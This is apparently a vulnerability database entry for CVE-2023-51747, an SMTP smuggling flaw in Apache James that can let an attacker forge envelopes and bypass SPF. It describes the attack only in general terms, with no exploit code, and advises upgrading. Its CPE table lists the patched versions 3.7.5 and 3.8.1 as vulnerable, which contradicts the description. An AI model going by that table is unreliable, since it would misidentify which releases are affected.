CVE-2023-51747
Severity CVSS v4.0:
Pending analysis
Type:
CWE-20
Input Validation
Publication date:
27/02/2024
Last modified:
05/05/2025
Description
Apache James prior to versions 3.8.1 and 3.7.5 is vulnerable to SMTP smuggling.<br />
<br />
A lenient behaviour in line delimiter handling might create a difference of interpretation between the sender and the receiver which can be exploited by an attacker to forge an SMTP envelop, allowing for instance to bypass SPF checks.<br />
<br />
The patch implies enforcement of CRLF as a line delimiter as part of the DATA transaction.<br />
<br />
We recommend James users to upgrade to non vulnerable versions.
Impact
Base Score 3.x
7.10
Severity 3.x
HIGH
Vulnerable products and versions
| CPE | From | Up to |
|---|---|---|
| cpe:2.3:a:apache:james:3.7.5:*:*:*:*:*:*:* | ||
| cpe:2.3:a:apache:james:3.8.1:*:*:*:*:*:*:* |
To consult the complete list of CPE names with products and versions, see this page
References to Advisories, Solutions, and Tools
- http://www.openwall.com/lists/oss-security/2024/02/27/4
- https://lists.apache.org/thread/rxkwbkh9vgbl9rzx1fkllyk3krhgydko
- https://postfix.org/smtp-smuggling.html
- https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/
- http://www.openwall.com/lists/oss-security/2024/02/27/4
- https://lists.apache.org/thread/rxkwbkh9vgbl9rzx1fkllyk3krhgydko
- https://postfix.org/smtp-smuggling.html
- https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/